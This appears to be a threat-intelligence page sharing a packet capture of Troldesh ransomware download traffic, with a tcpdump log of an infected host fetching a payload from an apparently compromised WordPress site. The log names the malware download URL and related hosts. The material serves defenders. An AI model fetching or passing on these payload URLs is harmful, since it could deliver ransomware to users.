
TROLDESH Ransomware PCAP Download Traffic Sample undergroundlabsuk.com 185.119.174.45

Download Attachments

  • 1 pcap 1cjpg
    Date added: May 30, 2019 6:51 am Added by: admin File size: 3 MB Downloads: 40

URLhaus Database

URLhaus tries to identify the malware associated with the payload served by a given malware URL. When URLhaus can identify the associated malware family, the payload is tagged accordingly (field "signature"). The page below gives an overview of payloads that URLhaus has identified as Ransomware.Troldesh.

2019-05-29 21:53:52.091291 IP 10.1.10.162.49184 > 185.119.174.45.80: Flags [P.], seq 1195198762:1195199227, ack 4032472939, win 16425, length 465: HTTP: GET /wp-content/themes/Divi/et-pagebuilder/1c.j HTTP/1.1
GET /wp-content/themes/Divi/et-pagebuilder/1c.j HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: undergroundlabsuk.com
Connection: Keep-Alive

2019-05-29 21:53:55.597305 IP 185.119.174.45.80 > 10.1.10.162.49184: Flags [P.], seq 1:406, ack 465, win 123, length 405: HTTP: HTTP/1.1 301 Moved Permanently
HTTP/1.1 301 Moved Permanently
Date: Thu, 30 May 2019 01:53:52 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location: https://undergroundlabsuk.com/wp-content/themes/Divi/et-pagebuilder/1c.j
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2019-05-29 21:53:55.891821 IP 185.119.174.45.80 > 10.1.10.162.49184: Flags [P.], seq 1:406, ack 465, win 123, length 405: HTTP: HTTP/1.1 301 Moved Permanently
HTTP/1.1 301 Moved Permanently
Date: Thu, 30 May 2019 01:53:52 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location: https://undergroundlabsuk.com/wp-content/themes/Divi/et-pagebuilder/1c.j
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2019-05-29 21:53:55.902075 IP 10.1.10.162.49185 > 185.119.174.45.443: Flags [P.], seq 3137670173:3137670307, ack 1653186217, win 16425, length 134
2019-05-29 21:54:12.260958 IP 10.1.10.162.49192 > 185.119.174.45.443: Flags [P.], seq 2305352218:2305352384, ack 1046836851, win 16425, length 166
2019-05-29 21:54:12.357676 IP 185.119.174.45.443 > 10.1.10.162.49194: Flags [P.], seq 1:146, ack 166, win 123, length 145
2019-05-29 21:54:12.892573 IP 10.1.10.162.49203 > 185.119.174.45.443: Flags [P.], seq 3572732553:3572732719, ack 4054164407, win 16425, length 166
2019-05-29 21:55:35.085480 IP 204.237.142.208.80 > 10.1.10.162.49293: Flags [P.], seq 1:914, ack 255, win 237, length 913: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 527
ETag: "C911F69DFEADAC3CC6E8285B7E18A61BF26D22F5E74E9A35FE21376765EAA26A"
Last-Modified: Wed, 29 May 2019 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=43194
Expires: Thu, 30 May 2019 13:55:28 GMT
Date: Thu, 30 May 2019 01:55:34 GMT
Connection: keep-alive

2019-05-29 21:55:52.309807 IP 10.1.10.162.49294 > 185.55.224.150.80: Flags [P.], seq 763839603:763839890, ack 2187406094, win 16425, length 287: HTTP: GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: westap.ir
Connection: Keep-Alive
